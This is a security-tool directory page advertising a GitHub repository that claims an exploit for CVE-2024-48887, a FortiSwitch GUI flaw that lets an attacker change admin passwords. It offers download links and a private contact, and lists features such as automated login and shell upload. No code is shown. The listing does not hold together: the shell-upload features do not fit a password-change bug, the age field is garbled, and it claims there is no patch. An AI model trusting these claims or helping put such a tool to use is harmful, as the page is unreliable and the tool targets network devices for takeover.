Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-48887-Exploit — Unverified Password Change (CWE-620) | Kitploit
Tools/GitHubGitHub/groshi215/cve-2024-48887-exploit
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingAuthenticationRed Teaming
GitHubgroshi215/cve-2024-48887-exploit

CVE-2024-48887-Exploit

Unverified Password Change (CWE-620)

View Repository
21 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2024-48887-Unverified Password Change (CWE-620)

Overview

An unverified password change vulnerability in Fortinet FortiSwitch GUI that allows a remote unauthenticated attacker to change admin passwords via a specially crafted request

Exploit:

Download here

Details

  • CVE ID: CVE-2024-48887

  • Published: 04/08/2025

  • Impact: Critical

  • Exploit Availability: Not public, only private.

  • CVSS: 9.8

  • Patch Available: (No official patch yet)

Impact

This critical vulnerability enables an external attacker to completely compromise administrative access to Fortinet FortiSwitch devices without requiring any authentication. An attacker could: - Arbitrarily change admin passwords - Potentially gain full control of the network switch - Bypass existing security controls - Compromise network infrastructure integrity and availability

Exploit Features

  • ✅ Automated Exploitation – Extracts nonce, logs in, and uploads the shell automatically.
  • ✅ Version Check – Confirms if the target is vulnerable before exploitation.
  • ✅ Error Handling – Ensures smooth execution even in case of failures.
  • ✅ Session Handling – Uses persistent session management for authentication.
  • ✅ Real-time Feedback – Provides output at each step.

Contact

  • **For inquiries, please contact:[email protected]
  • Exploit :Download here
Download Tool